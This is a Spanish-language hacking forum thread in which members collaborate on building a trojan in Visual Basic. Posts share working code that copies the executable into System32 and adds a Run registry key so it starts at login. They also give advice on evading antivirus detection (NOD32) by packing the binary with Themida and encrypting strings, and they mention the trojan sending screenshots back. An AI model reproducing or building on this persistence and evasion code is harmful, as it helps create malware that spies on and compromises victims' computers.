Mensajes

solo dejaba el link para q lo vean... esta publicado en Troyanos y virus... es un proyecto para q nos pongamos en camapaña y hagamos un lindo troyanito XD

no respondan aca si no en el otro foro

click aqui

ahora entendi!! disculpen mi ignoracia!! XD

entonces lo q yo tengo q cifrar sera esto:

Código [Seleccionar] Expandir

Clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Klass", System32 & "\klass.exe"


y me quedaria algo asi:

Código [Seleccionar] Expandir

Clave.regwrite funciondesencriptadora("djflsdflkasdf")

 

de donde lo bajaste?? de una fuente segura??

ninguno me puede explicar bien como cifro las cadenas??

porfa... tengo el server q pesa muchisimo y mucho mas lento

cuando compilaba el exe saltaba el AV

ahora q le pase el themida no lo detecta... pero es mas lento... por ejemplo para mandar los screenshot tarda un monton y eso q tienen resolucion baja (20)

lo logreeeee bueno...

bueno les cuento lo puse como esta en el codigo anterior... y le pase el themida... y por lo menos el NOD32 no lo detecta...
pasa q me quedo re pesado ahora...

si me pudieran explicar bien como cifrar las cadenas xq no lo termine de enteder se los agradeceria muchisimo...


IGUALMENTE MUCHAS GRACIAS A TODOS!

toy feliz de este logro

no te muestra en q linea salta el error... a mi en serio me acuerdo de haberlo visto...
deberias postear el code.. o donde te sale el error

ok miren... lo de copiar a System32 tengo esto:

y funciana

Modulo1

Código [Seleccionar] Expandir

Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Function System32() As String
    Dim buf As String
    Dim ret As Long
    buf = String$(260, Chr$(0))
    ret = GetSystemDirectory(buf, Len(buf))
    System32 = Left$(buf, ret)
End Function


Form

Código [Seleccionar] Expandir

Private Sub Form_Load()
On Error GoTo Fallo
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\prueba.exe"
Fallo:
End Sub


hasta ahi anda barbaro... no salta el antivirus ni nada... ahora en el form le agregue para q se ejecute y quedo asi:

form

Código [Seleccionar] Expandir

Dim clave As Object

Private Sub Form_Load()
On Error GoTo Error
Set clave = CreateObject("WScript.shell")
clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Klass", System32 & "\prueba.exe"
Error:
On Error GoTo Fallo
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\prueba.exe"
Fallo:
End Sub


y si... es como dice Hendrix. me lo detecta el AV.. ahora leo esos manuales... y despues dejo el code final aqui por si alguien lo necesita


para ser sincero no entendi lo de cifrar... es como sustituir la direccion por una variable???

Tambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32).

me podrias decir como lo cifro las cadenas??

Código [Seleccionar] Expandir

Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??

mmm la unica forma q se me ocurre.. seguro hay una mejor seria asi:

dimensionas 11 variables...

dim uno as ... dos as ... tres as..
y luego con If vez cual es la mas grande y la guardas en uno, la mas grande menor q uno y la guardas en dos...

espero q me hayas entendido :S jeje


suerte